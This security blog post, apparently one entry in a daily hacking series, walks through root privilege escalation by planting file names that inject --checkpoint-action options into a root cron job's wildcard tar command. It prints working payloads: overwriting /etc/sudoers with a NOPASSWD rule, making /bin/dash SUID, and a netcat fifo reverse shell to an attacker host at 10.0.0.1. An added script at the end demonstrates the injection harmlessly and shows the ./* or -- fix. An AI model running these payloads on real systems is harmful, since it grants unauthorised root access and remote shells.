Day 67: Tar Cron 2 Root — Abusing Wildcards for Tar Argument Injection in root cronjob (Nix)

The Backstory

A root cron job archives everything in a directory that our unprivileged user can write to:

cd /var/log/mon && tar -zcf /tmp/mon.tar.gz *
Basic examples of wildcard usage

It is the shell, not the command, that expands a wildcard: ls never sees *.php, only the list of matching file names.

# ls *.php
- List all files with the PHP extension

# rm *.gz
- Delete all GZIP files

# cat backup*
- Show the content of all files whose name begins with the string 'backup'

# ls test?
- List all files whose name begins with the string 'test' followed by exactly one additional character

Exploiting Wildcards

Write to /etc/sudoers

root@box$ echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers
user@box:/$ sudo bash
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)

Note that > replaces the whole file; appending with >> keeps the existing rules intact and is less likely to break sudo for other users on the box.

SUID /bin/dash or other similar bins

root@box$ chmod u+s /bin/dash
user@box$ /bin/dash
# id
uid=33(user) euid=0(root) groups=0(root),33(user)

dash is chosen because it keeps the effective UID it is started with; bash drops euid back to the real user unless it is invoked with -p.

Shell (Reverse/Bind)

Here the payload script (shell.sh, in place of privesc.sh) holds the usual fifo reverse shell, which the cron job runs as root:

root@box$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f" > shell.sh

Start the listener on the attacker host (10.0.0.1) before the job fires:

user@box$ nc -lvnp 1234
# id
uid=0(root) gid=0(root) groups=0(root)

The Glue

root@box:/var/log/mon# crontab -l
*/01 * * * * cd /var/log/mon && tar -zcf /tmp/mon.tar.gz *

The shell expands the * before tar starts, so tar receives one argument per file name in /var/log/mon. GNU tar accepts options anywhere on its command line, so a file whose name begins with -- is parsed as an option rather than archived as a file. Two options from the GNU tar manual turn that into command execution:

--checkpoint[=NUMBER]
display progress messages every NUMBERth record (default 10)

--checkpoint-action=ACTION
execute ACTION on each checkpoint

Putting It All Together

Working inside the directory the cron job archives, drop the payload script and two empty files whose names are the tar options. The quotes keep the space in the second name, and the shell treats a redirection target as a file name, so neither echo complains about the leading dashes:

user@box:/var/log/mon$ echo 'echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
user@box:/var/log/mon$ echo "" > "--checkpoint-action=exec=sh privesc.sh"
user@box:/var/log/mon$ echo "" > --checkpoint=1

The next time the job fires (within a minute, given */01), tar runs sh privesc.sh as root from /var/log/mon, which writes the sudoers entry:

user@box:/$ sudo bash
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)
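To make the mechanism observable without a root cron job, the following script (added here; it is not part of the original post) rebuilds the attack in a throwaway directory with a harmless payload, then runs the same tar command with a hardened glob to show that the injected option no longer fires. It assumes GNU tar (busybox tar has no --checkpoint-action) and gzip on PATH; the /tmp/wildcard-lab.* paths and the marker file are made up for the demonstration.

```bash
#!/bin/sh
# Added example, not code from the original post: reproduce the tar wildcard
# injection in a throwaway directory and contrast it with a hardened glob.
# Assumptions: GNU tar and gzip are on PATH; the /tmp/wildcard-lab.* paths
# and the "marker" file name are made up for this demo.

# Stand-in for the root cron job from the post. $1 = directory to archive,
# $2 = archive path, $3 = glob form: "*" (as in the crontab) or "./*".
# The shell expands the glob here, exactly as cron's /bin/sh would.
run_cron_tar() {
    if [ "$3" = "./*" ]; then
        ( cd "$1" && tar -zcf "$2" ./* ) 2>/dev/null
    else
        ( cd "$1" && tar -zcf "$2" * ) 2>/dev/null
    fi
}

# Attacker setup: a payload script plus two empty files whose *names* are tar
# options. Only the right to create files in the directory is needed.
# Prints the directory path.
setup_lab() {
    dir=$(mktemp -d /tmp/wildcard-lab.XXXXXX) || return 1
    # The real payload would write /etc/sudoers or chmod u+s a shell; this one
    # only drops a marker file so the run is observable. tar executes the
    # checkpoint action via sh in its working directory, so a relative path works.
    printf 'echo pwned > marker\n' > "$dir/privesc.sh"
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh privesc.sh"
    echo "$dir"
}

# Run one scenario and report "pwned" if the injected action executed,
# "clean" otherwise. $1 = glob form handed to run_cron_tar.
attack_result() {
    dir=$(setup_lab) || return 1
    run_cron_tar "$dir" "$dir.tar.gz" "$1"
    if [ -f "$dir/marker" ]; then result=pwned; else result=clean; fi
    rm -rf "$dir" "$dir.tar.gz"
    echo "$result"
}

echo "crontab form  (tar -zcf ... *):   $(attack_result '*')"    # pwned
echo "hardened form (tar -zcf ... ./*): $(attack_result './*')"  # clean
```

The crontab's form prints pwned: the file named --checkpoint-action=exec=sh privesc.sh reaches tar as a single argument and is parsed as an option. With ./* the shell still expands to the same files, but every name now begins with ./, so tar cannot mistake any of them for an option and the archive is created without running anything. Putting -- before the glob has the same effect, since GNU tar stops option parsing there.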

Security Researcher / 365 Days of PWN